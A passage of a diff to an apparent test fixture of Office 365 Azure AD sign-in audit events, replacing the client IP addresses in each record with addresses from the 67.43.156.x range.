"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4060,10 +4060,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:33:50", "ExtendedProperties": [ { @@ -4113,7 +4113,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4131,10 +4131,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:38", "ExtendedProperties": [ { @@ -4184,7 +4184,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4202,10 +4202,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:44:05", "ExtendedProperties": [ { @@ -4255,7 +4255,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4273,10 +4273,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:28:51", "ExtendedProperties": [ { @@ -4326,7 +4326,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4344,10 +4344,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:25:21", "ExtendedProperties": [ { @@ -4397,7 +4397,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4415,10 +4415,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:20", "ExtendedProperties": [ { @@ -4468,7 +4468,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4486,10 +4486,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:44:02", "ExtendedProperties": [ { @@ -4539,7 +4539,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 